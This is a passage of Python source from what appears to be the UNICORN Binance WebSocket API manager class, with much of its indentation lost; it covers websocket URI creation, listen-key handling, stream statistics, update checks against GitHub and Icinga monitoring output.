except TypeError:
pass
if response:
try:
uri = self.websocket_base_uri + "ws/" + str(response['listenKey'])
uri_hidden_secret = self.websocket_base_uri + "ws/" + self.replaced_secrets_text
if self.show_secrets_in_logs is True:
logger.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + str(symbols) + ") - result: " + uri)
else:
logger.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) +
", " + str(markets) + ", " + str(symbols) + ") - result: " +
uri_hidden_secret)
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return uri
except KeyError:
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", "
+ str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not "
"create URI!!")
return False
except TypeError:
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", "
+ str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not "
"create URI!!")
return False
else:
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not create "
"URI!!")
return False
else:
logger.critical("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - error_msg: can not create URI!!")
return False
elif "!bookTicker" in channels or "!bookTicker" in markets:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/!bookTicker"
elif "arr" in channels or "$all" in markets:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + markets[0] + "@" + channels[0]
elif "arr" in markets or "$all" in channels:
if stream_id:
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + channels[0] + "@" + markets[0]
elif self.is_exchange_type("dex"):
if re.match(r'[a-zA-Z0-9]{41,43}', markets[0]) is not None:
try:
if self.stream_list[stream_id]['dex_user_address'] is False:
self.stream_list[stream_id]['dex_user_address'] = markets[0]
if self.stream_list[stream_id]['dex_user_address'] != markets[0]:
logger.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Error: once set, the "
"dex_user_address is not allowed to get changed anymore!")
return False
except KeyError:
pass
add_payload = {"method": "subscribe",
"topic": channels[0],
"address": markets[0]}
payload.append(add_payload)
if stream_id:
self.stream_list[stream_id]['payload'] = payload
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + "ws/" + markets[0]
elif markets[0] != "" and channels[0] != "":
return self.websocket_base_uri + "ws/" + markets[0] + "@" + channels[0]
else:
logger.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Error: not able to create websocket "
"URI for DEX")
return False
if self.is_exchange_type("dex"):
query = "ws"
if stream_id:
payload = self.create_payload(stream_id, "subscribe", channels=channels, markets=markets)
self.stream_list[stream_id]['payload'] = payload
self.stream_list[stream_id]['subscriptions'] = self.get_number_of_subscriptions(stream_id)
return self.websocket_base_uri + str(query)
else:
query = "stream?streams="
final_market = "@arr"
market = ""
channel = ""
for market in markets:
if "arr@" in market:
final_market = "@" + market
final_channel = "@arr"
for channel in channels:
if "arr@" in channel:
final_channel = "@" + channel
for channel in channels:
if channel == "!userData":
logger.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Can not create "
"'outboundAccountInfo' in a multi channel socket! "
"Unfortunately Binance only stream it in a single stream socket! ./"
"Use binance_websocket_api_manager.create_stream([\"arr\"], [\"!userData\"]) to "
"initiate an extra connection.")
return False
for market in markets:
if market == "!userData":
logger.error("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Can not create "
"'outboundAccountInfo' in a multi channel socket! "
"Unfortunatly Binance only stream it in a single stream socket! ./"
"Use binance_websocket_api_manager.create_stream([\"arr\"], [\"!userData\"]) to "
"initiate an extra connection.")
return False
if "!" in channel:
query += channel + final_market
elif "!" in market:
query += market + final_channel
else:
query += market.lower() + "@" + channel
try:
if self.subscribe_to_stream(stream_id, markets=markets, channels=channels) is False:
sys.exit(1)
except KeyError:
pass
logger.info("BinanceWebSocketApiManager.create_websocket_uri(" + str(channels) + ", " +
str(markets) + ", " + ", " + str(symbols) + ") - Created websocket URI for stream_id=" +
str(stream_id) + " is " + self.websocket_base_uri + str(query))
return self.websocket_base_uri + str(query)
def delete_listen_key_by_stream_id(self, stream_id):
"""
Delete a binance listen_key from a specific !userData stream
:param stream_id: id of a !userData stream
:type stream_id: uuid
"""
try:
if self.stream_list[stream_id]['listen_key'] is not False:
logger.info("BinanceWebSocketApiManager.delete_listen_key_by_stream_id(" + str(stream_id) + ")")
self.restclient.delete_listen_key(stream_id)
except KeyError:
return False
def delete_stream_from_stream_list(self, stream_id):
"""
Delete a stream from the stream_list
Even if a stream crashes or gets stopped, its data remains in the BinanceWebSocketApiManager till you stop the
BinanceWebSocketApiManager itself. If you want to tidy up the stream_list you can use this method.
:param stream_id: id of a stream
:type stream_id: uuid
:return: the removed stream_list entry (dict) or False
"""
logger.info("BinanceWebSocketApiManager.delete_stream_from_stream_list(" + str(stream_id) + ")")
return self.stream_list.pop(stream_id, False)
def fill_up_space_left(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars` on the left side
        :param demand_of_chars: how many characters should the string have?
        :type demand_of_chars: int
        :param string: the string that has to get filled up with `filling` chars
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
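        Example (illustrative sketch - `ubwa` stands for an assumed BinanceWebSocketApiManager instance):
            ubwa.fill_up_space_left(8, "42")  # returns "     42 " (five fill chars, the value, one trailing fill char)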
"""
blanks_pre = ""
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string)) - 1
while len(blanks_pre) < demand_of_blanks:
blanks_pre += filling
blanks_post = filling
return blanks_pre + str(string) + blanks_post
def fill_up_space_centered(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars`
        :param demand_of_chars: how many characters should the string have?
        :type demand_of_chars: int
        :param string: the string that has to get filled up with `filling` chars
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = ""
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string)) - 1
while (len(blanks_pre)+len(blanks_post)) < demand_of_blanks:
blanks_pre += filling
if (len(blanks_pre) + len(blanks_post)) < demand_of_blanks:
blanks_post += filling
return blanks_pre + str(string) + blanks_post
def fill_up_space_right(self, demand_of_chars, string, filling=" "):
"""
Add whitespaces to `string` to a length of `demand_of_chars` on the right side
        :param demand_of_chars: how many characters should the string have?
        :type demand_of_chars: int
        :param string: the string that has to get filled up with `filling` chars
:type string: str
:param filling: filling char (default: blank space)
:type filling: str
:return: the filled up string
"""
blanks_pre = " "
blanks_post = ""
demand_of_blanks = demand_of_chars - len(str(string))
while len(blanks_post) < demand_of_blanks-1:
blanks_pre = filling
blanks_post += filling
string = blanks_pre + str(string) + blanks_post
return string[0:demand_of_chars]
def get_active_stream_list(self):
"""
Get a list of all active streams
        :return: dict or False
"""
# get the stream_list without stopped and crashed streams
stream_list_with_active_streams = {}
for stream_id in self.stream_list:
if self.stream_list[stream_id]['status'] == "running":
stream_list_with_active_streams[stream_id] = self.stream_list[stream_id]
        try:
            if len(stream_list_with_active_streams) > 0:
                return stream_list_with_active_streams
            else:
                return False
        except KeyError:
            return False
        except UnboundLocalError:
            return False
def get_all_receives_last_second(self):
"""
Get the number of all receives of the last second
:return: int
"""
all_receives_last_second = 0
last_second_timestamp = int(time.time()) - 1
for stream_id in self.stream_list:
try:
all_receives_last_second += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][
last_second_timestamp]
except KeyError:
pass
return all_receives_last_second
def get_binance_api_status(self):
"""
`get_binance_api_status()` is obsolete and will be removed in future releases, please use `get_used_weight()`
instead!
:return: dict
"""
logger.warning("`get_binance_api_status()` is obsolete and will be removed in future releases, please use"
"`get_used_weight()` instead!")
return self.binance_api_status
def get_used_weight(self):
"""
Get used_weight, last status_code and the timestamp of the last status update
:return: dict
"""
return self.binance_api_status
def get_current_receiving_speed(self, stream_id):
"""
Get the receiving speed of the last second in Bytes
        :param stream_id: id of a stream
        :type stream_id: uuid
        :return: int
"""
current_timestamp = int(time.time())
last_timestamp = current_timestamp - 1
try:
if self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][last_timestamp] > 0:
self.stream_list[stream_id]['transfer_rate_per_second']['speed'] = \
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][last_timestamp]
except TypeError:
return 0
except KeyError:
return 0
try:
current_receiving_speed = self.stream_list[stream_id]['transfer_rate_per_second']['speed']
except KeyError:
current_receiving_speed = 0
return current_receiving_speed
def get_current_receiving_speed_global(self):
"""
Get the receiving speed of the last second in Bytes from all streams!
:return: int
"""
current_receiving_speed = 0
try:
temp_stream_list = copy.deepcopy(self.stream_list)
except RuntimeError as error_msg:
logger.debug(f"BinanceWebSocketApiManager.get_current_receiving_speed_global() - RuntimeError: "
f"{str(error_msg)}")
return 0
        except TypeError as error_msg:
            logger.debug(f"BinanceWebSocketApiManager.get_current_receiving_speed_global() - TypeError: "
                         f"{str(error_msg)}")
return 0
for stream_id in temp_stream_list:
current_receiving_speed += self.get_current_receiving_speed(stream_id)
return current_receiving_speed
@staticmethod
def get_date_of_timestamp(timestamp):
"""
Convert a timestamp into a readable date/time format for humans
:param timestamp: provide the timestamp you want to convert into a date
:type timestamp: timestamp
:return: str
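        Example (illustrative sketch):
            BinanceWebSocketApiManager.get_date_of_timestamp(1609459200)  # returns "2021-01-01, 00:00:00 UTC"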
"""
date = str(datetime.utcfromtimestamp(timestamp).strftime('%Y-%m-%d, %H:%M:%S UTC'))
return date
def get_errors_from_endpoints(self):
"""
        Get all the error messages sent by the endpoints that are stored in the ringbuffer.
:return: list
"""
return self.ringbuffer_error
def get_event_loop_by_stream_id(self, stream_id=False):
"""
Get the asyncio event loop used by a specific stream.
:return: asyncio event loop or False
"""
if stream_id is False:
return False
else:
return self.event_loops[stream_id]
def get_exchange(self):
"""
Get the name of the used exchange like "binance.com" or "binance.org-testnet"
:return: str
"""
return self.exchange
@staticmethod
def get_human_bytesize(bytes, suffix=""):
"""
Convert the bytes to something readable
:param bytes: amount of bytes
:type bytes: int
:param suffix: add a string after
:type suffix: str
        :return: str
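        Example (illustrative sketch):
            BinanceWebSocketApiManager.get_human_bytesize(123456789)  # returns "117.74 mB"
            BinanceWebSocketApiManager.get_human_bytesize(2048, "/s")  # returns "2.0 kB/s"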
"""
        if bytes > 1024 * 1024 * 1024 * 1024:
bytes = str(round(bytes / (1024 * 1024 * 1024 * 1024), 3)) + " tB" + suffix
elif bytes > 1024 * 1024 * 1024:
bytes = str(round(bytes / (1024 * 1024 * 1024), 2)) + " gB" + suffix
elif bytes > 1024 * 1024:
bytes = str(round(bytes / (1024 * 1024), 2)) + " mB" + suffix
elif bytes > 1024:
bytes = str(round(bytes / 1024, 2)) + " kB" + suffix
else:
bytes = str(bytes) + " B" + suffix
return bytes
@staticmethod
def get_human_uptime(uptime):
"""
Convert a timespan of seconds into hours, days, ...
:param uptime: Uptime in seconds
:type uptime: int
        :return: str
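        Example (illustrative sketch):
            BinanceWebSocketApiManager.get_human_uptime(90061)  # returns "1d:1h:1m:1s"
            BinanceWebSocketApiManager.get_human_uptime(42)  # returns "42 seconds"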
"""
if uptime > (60 * 60 * 24):
uptime_days = int(uptime / (60 * 60 * 24))
uptime_hours = int(((uptime - (uptime_days * (60 * 60 * 24))) / (60 * 60)))
uptime_minutes = int((uptime - ((uptime_days * (60 * 60 * 24)) + (uptime_hours * 60 * 60))) / 60)
uptime_seconds = int(
uptime - ((uptime_days * (60 * 60 * 24)) + ((uptime_hours * (60 * 60)) + (uptime_minutes * 60))))
uptime = str(uptime_days) + "d:" + str(uptime_hours) + "h:" + str(int(uptime_minutes)) + "m:" + str(
int(uptime_seconds)) + "s"
elif uptime > (60 * 60):
uptime_hours = int(uptime / (60 * 60))
uptime_minutes = int((uptime - (uptime_hours * (60 * 60))) / 60)
uptime_seconds = int(uptime - ((uptime_hours * (60 * 60)) + (uptime_minutes * 60)))
uptime = str(uptime_hours) + "h:" + str(int(uptime_minutes)) + "m:" + str(int(uptime_seconds)) + "s"
elif uptime > 60:
uptime_minutes = int(uptime / 60)
uptime_seconds = uptime - uptime_minutes * 60
uptime = str(uptime_minutes) + "m:" + str(int(uptime_seconds)) + "s"
else:
uptime = str(int(uptime)) + " seconds"
return uptime
@staticmethod
def get_latest_release_info():
"""
        Get info about the latest available release
:return: dict or False
"""
try:
respond = requests.get('https://api.github.com/repos/oliver-zehentleitner/unicorn-binance-websocket-api/'
'releases/latest')
latest_release_info = respond.json()
return latest_release_info
except Exception:
return False
@staticmethod
def get_latest_release_info_check_command():
"""
        Get info about the latest available `check_lucit_collector` release
:return: dict or False
"""
try:
respond = requests.get('https://api.github.com/repos/LUCIT-Development/check_lucit_collector.py/'
'releases/latest')
return respond.json()
except Exception:
return False
def get_latest_version(self):
"""
Get the version of the latest available release (cache time 1 hour)
:return: str or False
"""
        # Do a fresh request if status is None or the last timestamp is older than 1 hour
if self.last_update_check_github['status'] is None or \
(self.last_update_check_github['timestamp']+(60*60) < time.time()):
self.last_update_check_github['status'] = self.get_latest_release_info()
if self.last_update_check_github['status']:
try:
return self.last_update_check_github['status']["tag_name"]
except KeyError:
return "unknown"
else:
return "unknown"
def get_latest_version_check_command(self):
"""
Get the version of the latest available `check_lucit_collector.py` release (cache time 1 hour)
:return: str or False
"""
        # Do a fresh request if status is None or the last timestamp is older than 1 hour
if self.last_update_check_github_check_command['status'] is None or \
(self.last_update_check_github_check_command['timestamp'] + (60 * 60) < time.time()):
self.last_update_check_github_check_command['status'] = self.get_latest_release_info_check_command()
if self.last_update_check_github_check_command['status']:
try:
return self.last_update_check_github_check_command['status']["tag_name"]
except KeyError:
return "unknown"
else:
return "unknown"
def get_limit_of_subscriptions_per_stream(self):
"""
Get the number of allowed active subscriptions per stream (limit of binance API)
:return: int
"""
return self.max_subscriptions_per_stream
def get_number_of_all_subscriptions(self):
"""
        Get the number of all stream subscriptions
        :return: int
"""
subscriptions = 0
try:
active_stream_list = copy.deepcopy(self.get_active_stream_list())
if active_stream_list:
for stream_id in active_stream_list:
subscriptions += active_stream_list[stream_id]['subscriptions']
self.all_subscriptions_number = subscriptions
except TypeError:
return self.all_subscriptions_number
except RuntimeError:
return self.all_subscriptions_number
return subscriptions
def get_number_of_free_subscription_slots(self, stream_id):
"""
Get the number of free subscription slots (max allowed subscriptions - subscriptions) of a specific stream
:return: int
"""
free_slots = self.max_subscriptions_per_stream - self.stream_list[stream_id]['subscriptions']
return free_slots
def get_listen_key_from_restclient(self, stream_id, api_key, api_secret, symbols=False):
"""
Get a new or cached (<30m) listen_key
:param stream_id: provide a stream_id
:type stream_id: uuid
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
        :return: dict or False
"""
if (self.stream_list[stream_id]['start_time'] + self.stream_list[stream_id]['listen_key_cache_time']) > \
time.time() or (self.stream_list[stream_id]['last_static_ping_listen_key'] +
self.stream_list[stream_id]['listen_key_cache_time']) > time.time():
# listen_key is not older than 30 min
if self.stream_list[stream_id]['listen_key'] is not False:
response = {'listenKey': self.stream_list[stream_id]['listen_key']}
return response
# no cached listen_key or listen_key is older than 30 min
# acquire a new listen_key:
response = self.restclient.get_listen_key(stream_id)
if response:
# save and return the valid listen_key
try:
self.stream_list[stream_id]['listen_key'] = str(response['listenKey'])
return response
except KeyError:
# no valid listen_key, but a response from endpoint
return response
except TypeError:
return response
else:
# no valid listen_key
return False
def get_most_receives_per_second(self):
"""
Get the highest total receives per second value
:return: int
"""
return self.most_receives_per_second
def get_number_of_streams_in_stream_list(self):
"""
Get the number of streams that are stored in the stream_list
:return: int
"""
return len(self.stream_list)
def get_number_of_subscriptions(self, stream_id):
"""
Get the number of subscriptions of a specific stream
:return: int
"""
count_subscriptions = 0
for channel in self.stream_list[stream_id]['channels']:
if "!" in channel \
or channel == "orders" \
or channel == "accounts" \
or channel == "transfers" \
or channel == "allTickers" \
or channel == "allMiniTickers" \
or channel == "blockheight":
count_subscriptions += 1
continue
else:
for market in self.stream_list[stream_id]['markets']:
if "!" in market \
or market == "orders" \
or market == "accounts" \
or market == "transfers" \
or market == "allTickers" \
or market == "allMiniTickers" \
or market == "blockheight":
count_subscriptions += 1
else:
count_subscriptions += 1
return count_subscriptions
def get_keep_max_received_last_second_entries(self):
"""
        Get the number of received_last_second entries that are stored before they get deleted
:return: int
"""
return self.keep_max_received_last_second_entries
def get_monitoring_status_icinga(self, check_command_version=False, warn_on_update=True):
"""
Get status and perfdata to monitor and collect metrics with ICINGA/Nagios
status: OK, WARNING, CRITICAL
- WARNING: on restarts, available updates
- CRITICAL: crashed streams
perfdata:
- average receives per second since last status check
- average speed per second since last status check
- total received bytes since start
- total received length since start
- stream_buffer size
- stream_buffer length
- reconnects
- uptime
        :param check_command_version: the version of the calling `check_command <https://github.com/LUCIT-Development/check_lucit_collector.py>`_
:type check_command_version: str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:return: dict (text, time, return_code)
"""
result = self.get_monitoring_status_plain(check_command_version=check_command_version,
warn_on_update=warn_on_update)
if len(result['update_msg']) > 0 or len(result['status_msg']) > 0:
text_msg = " -" + str(result['status_msg']) + str(result['update_msg'])
else:
text_msg = ""
check_message = "BINANCE WEBSOCKETS (" + self.exchange + ") - " + result['status_text'] + ": O:" + \
str(result['active_streams']) + \
"/R:" + str(result['restarting_streams']) + "/C:" + str(result['crashed_streams']) + "/S:" + \
str(result['stopped_streams']) + text_msg + " | " + \
"active streams=" + str(result['active_streams']) + ";;;0 " + \
"average_receives_per_second=" + str(result['average_receives_per_second']) + \
";;;0 current_receiving_speed_per_second=" + str(result['average_speed_per_second']) + \
"KB;;;0 total_received_length=" + str(result['total_received_length']) + "c;;;0 total_" \
"received_size=" + str(result['total_received_mb']) + "MB;;;0 stream_buffer_size=" + \
str(result['stream_buffer_mb']) + "MB;;;0 stream_buffer_length=" + \
str(result['stream_buffer_items']) + ";;;0 reconnects=" + str(result['reconnects']) + "c;;;0 " \
"uptime_days=" + str(result['uptime']) + "c;;;0"
status = {'text': check_message,
'time': int(result['timestamp']),
'return_code': result['return_code']}
return status
def get_monitoring_status_plain(self, check_command_version=False, warn_on_update=True):
"""
Get plain monitoring status data:
active_streams, crashed_streams, restarting_streams, stopped_streams, return_code, status_text,
timestamp, update_msg, average_receives_per_second, average_speed_per_second, total_received_mb,
stream_buffer_items, stream_buffer_mb, reconnects, uptime
        :param check_command_version: the version of the calling `check_command <https://github.com/LUCIT-Development/check_lucit_collector.py>`_
:type check_command_version: False or str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:return: dict
"""
        result = {'active_streams': 0,
                  'crashed_streams': 0,
                  'restarting_streams': 0,
                  'highest_restart_per_stream_last_hour': 0,
                  'return_code': 0,
                  'status_text': "OK",
                  'status_msg': "",
                  'stopped_streams': 0,
                  'timestamp': time.time(),
                  'update_msg': ""}
time_period = result['timestamp'] - self.last_monitoring_check
timestamp_last_hour = time.time() - (60*60)
try:
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
is_update_available_unicorn_fy = unicorn_fy.is_update_availabe()
except ModuleNotFoundError:
logger.critical("BinanceWebSocketApiManager.get_monitoring_status_plain() - UnicornFy not installed!")
is_update_available_unicorn_fy = False
except AttributeError:
logger.error("BinanceWebSocketApiManager.get_monitoring_status_plain() - UnicornFy outdated!")
is_update_available_unicorn_fy = True
if check_command_version:
is_update_available_check_command = self.is_update_availabe_check_command(
check_command_version=check_command_version)
else:
is_update_available_check_command = True
for stream_id in self.stream_list:
stream_restarts_last_hour = 0
for reconnect in self.stream_list[stream_id]['logged_reconnects']:
if reconnect > timestamp_last_hour:
stream_restarts_last_hour += 1
if stream_restarts_last_hour > result['highest_restart_per_stream_last_hour']:
result['highest_restart_per_stream_last_hour'] = stream_restarts_last_hour
for stream_id in self.stream_list:
if self.stream_list[stream_id]['status'] == "running":
result['active_streams'] += 1
elif self.stream_list[stream_id]['status'] == "stopped":
result['stopped_streams'] += 1
elif self.stream_list[stream_id]['status'] == "restarting":
result['restarting_streams'] += 1
elif "crashed" in self.stream_list[stream_id]['status']:
result['crashed_streams'] += 1
if self.is_update_availabe() and is_update_available_unicorn_fy and is_update_available_check_command:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API, UnicornFy and " \
"check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_availabe() and is_update_available_unicorn_fy:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API and UnicornFy"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_availabe() and is_update_available_check_command:
result['update_msg'] = " Update available: UNICORN Binance WebSocket API and check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_unicorn_fy and is_update_available_check_command:
result['update_msg'] = " Update available: UnicornFy and check_lucit_collector.py!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif self.is_update_availabe():
result['update_msg'] = " Update " + str(self.get_latest_version()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_unicorn_fy:
result['update_msg'] = " Update UnicornFy " + str(unicorn_fy.get_latest_version()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
elif is_update_available_check_command:
result['update_msg'] = " Update `check_lucit_collector.py` " + \
str(self.get_latest_version_check_command()) + " available!"
if warn_on_update is True:
result['status_text'] = "WARNING"
result['return_code'] = 1
if result['highest_restart_per_stream_last_hour'] >= 10:
result['status_text'] = "CRITICAL"
result['return_code'] = 2
result['status_msg'] = " Restart rate per stream last hour: " + \
str(result['highest_restart_per_stream_last_hour'])
elif result['crashed_streams'] > 0:
result['status_text'] = "CRITICAL"
result['return_code'] = 2
elif result['highest_restart_per_stream_last_hour'] >= 3:
result['status_text'] = "WARNING"
result['return_code'] = 1
result['status_msg'] = " Restart rate per stream last hour: " + \
str(result['highest_restart_per_stream_last_hour'])
        result['average_receives_per_second'] = round((self.total_receives - self.monitoring_total_receives) /
                                                      time_period, 2)
        result['average_speed_per_second'] = round(((self.total_received_bytes - self.monitoring_total_received_bytes) /
                                                    time_period) / 1024, 2)
        result['total_received_mb'] = round(self.get_total_received_bytes() / (1024 * 1024), 2)
        result['total_received_length'] = self.total_receives
        result['stream_buffer_items'] = str(self.get_stream_buffer_length())
        result['stream_buffer_mb'] = round(self.get_stream_buffer_byte_size() / (1024 * 1024), 4)
        result['reconnects'] = self.get_reconnects()
        self.monitoring_total_receives = self.get_total_receives()
        self.monitoring_total_received_bytes = self.get_total_received_bytes()
        self.last_monitoring_check = result['timestamp']
        result['uptime'] = round((result['timestamp'] - self.start_time) / (60*60*24), 3)
return result
def get_process_usage_memory(self):
"""
Get the used memory of this process
:return: str
"""
process = psutil.Process(os.getpid())
memory = self.get_human_bytesize(process.memory_info()[0])
return memory
def get_process_usage_cpu(self):
"""
Get the used cpu power of this process
        :return: float or False
"""
try:
cpu = psutil.cpu_percent(interval=None)
except OSError as error_msg:
logger.error(f"BinanceWebSocketApiManager.get_process_usage_cpu() - OSError - error_msg: {str(error_msg)}")
return False
return cpu
def get_process_usage_threads(self):
"""
Get the amount of threads that this process is using
:return: int
"""
threads = threading.active_count()
return threads
def get_reconnects(self):
"""
Get the number of total reconnects
:return: int
"""
return self.reconnects
def get_request_id(self):
"""
Get a unique `request_id`
:return: int
"""
with self.request_id_lock:
self.request_id += 1
return self.request_id
def get_result_by_request_id(self, request_id=False, timeout=10):
"""
Get the result related to the provided `request_id`
:param request_id: if you run `get_stream_subscriptions()
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_stream_subscriptions>`_
it returns a unique `request_id` - provide it to this method to receive the result.
:type request_id: stream_id (uuid)
        :param timeout: seconds to wait for the result - if it does not arrive in time, `False` is returned
        :type timeout: int
:return: `result` or False
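        Example (illustrative sketch - `ubwa` stands for an assumed manager instance with an active CEX stream):
            request_id = ubwa.get_stream_subscriptions(stream_id)
            result = ubwa.get_result_by_request_id(request_id, timeout=10)
            if result is not False:
                print(result)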
"""
if request_id is False:
return False
wait_till_timestamp = time.time() + timeout
while wait_till_timestamp >= time.time():
for result in self.ringbuffer_result:
result_dict = json.loads(result)
if result_dict['id'] == request_id:
return result
return False
def get_results_from_endpoints(self):
"""
        Get all the result messages sent by the endpoints that are stored in the ringbuffer.
:return: list
"""
return self.ringbuffer_result
def get_ringbuffer_error_max_size(self):
"""
        Get the maximum number of entries to store in the error ringbuffer
:return: int
"""
return self.ringbuffer_error_max_size
def get_ringbuffer_result_max_size(self):
"""
        Get the maximum number of entries to store in the result ringbuffer
:return: int
"""
return self.ringbuffer_result_max_size
def get_start_time(self):
"""
Get the start_time of the BinanceWebSocketApiManager instance
:return: timestamp
"""
return self.start_time
def get_stream_buffer_byte_size(self):
"""
Get the current byte size estimation of the stream_buffer
:return: int
"""
total_received_bytes = self.get_total_received_bytes()
total_receives = self.get_total_receives()
stream_buffer_length = self.get_stream_buffer_length()
return round(total_received_bytes / total_receives * stream_buffer_length)
def get_stream_buffer_length(self):
"""
Get the current number of items in all stream_buffer
:return: int
"""
number = 0
number += len(self.stream_buffer)
for stream_buffer_name in self.stream_buffers:
number += len(self.stream_buffers[stream_buffer_name])
return number
def get_stream_id_by_label(self, stream_label=False):
"""
Get the stream_id of a specific stream by stream label
:param stream_label: stream_label of the stream you search
:type stream_label: str
:return: stream_id or False
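        Example (illustrative sketch - assumes a stream was created with `stream_label="bests"` and `ubwa` is the
        manager instance):
            stream_id = ubwa.get_stream_id_by_label("bests")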
"""
if stream_label:
for stream_id in self.stream_list:
if self.stream_list[stream_id]['stream_label'] == stream_label:
return stream_id
return False
def get_stream_info(self, stream_id):
"""
        Get all info about a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
        :return: dict or False
"""
current_timestamp = time.time()
try:
temp_stream_list = copy.deepcopy(self.stream_list[stream_id])
except RuntimeError:
logger.error("BinanceWebSocketApiManager.get_stream_info(" + str(stream_id) + ") Info: RuntimeError")
return self.get_stream_info(stream_id)
except KeyError:
logger.error("BinanceWebSocketApiManager.get_stream_info(" + str(stream_id) + ") Info: KeyError")
return False
if temp_stream_list['last_heartbeat'] is not None:
temp_stream_list['seconds_to_last_heartbeat'] = \
current_timestamp - self.stream_list[stream_id]['last_heartbeat']
if temp_stream_list['has_stopped'] is not False:
temp_stream_list['seconds_since_has_stopped'] = \
int(current_timestamp) - int(self.stream_list[stream_id]['has_stopped'])
try:
self.stream_list[stream_id]['processed_receives_statistic'] = self.get_stream_statistic(stream_id)
except ZeroDivisionError:
pass
self.stream_list[stream_id]['transfer_rate_per_second']['speed'] = self.get_current_receiving_speed(stream_id)
return temp_stream_list
def get_stream_label(self, stream_id=False):
"""
Get the stream_label of a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: str or False
"""
if stream_id:
return self.stream_list[stream_id]['stream_label']
else:
return False
def get_stream_subscriptions(self, stream_id, request_id=False):
"""
Get a list of subscriptions of a specific stream from Binance endpoints - the result can be received via
the `stream_buffer` and is also added to the results ringbuffer - `get_results_from_endpoints()
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_results_from_endpoints>`_
to get all results or use `get_result_by_request_id(request_id)
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_result_by_request_id>`_
to get a specific one!
This function is supported by CEX endpoints only!
Info: https://github.com/binance-exchange/binance-official-api-docs/blob/master/web-socket-streams.md#listing-subscriptions
:param stream_id: id of a stream
:type stream_id: uuid
:param request_id: id to use for the request - use `get_request_id()` to create a unique id. If not provided or
`False`, then this method is using `get_request_id()
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.get_request_id>`_
automatically.
:type request_id: int
:return: request_id (int)
"""
if request_id is False:
request_id = self.get_request_id()
if self.is_exchange_type('dex'):
logger.error("BinanceWebSocketApiManager.get_stream_subscriptions(" + str(stream_id) + ", " +
str(request_id) + ") DEX websockets dont support the listing of subscriptions! Request not "
"sent!")
return False
elif self.is_exchange_type('cex'):
payload = {"method": "LIST_SUBSCRIPTIONS",
"id": request_id}
self.stream_list[stream_id]['payload'].append(payload)
logger.info("BinanceWebSocketApiManager.get_stream_subscriptions(" + str(stream_id) + ", " +
str(request_id) + ") payload added!")
return request_id
else:
return False
def get_stream_list(self):
"""
Get a list of all streams
        :return: dict
"""
# get the stream list
temp_stream_list = {}
for stream_id in self.stream_list:
temp_stream_list[stream_id] = self.get_stream_info(stream_id)
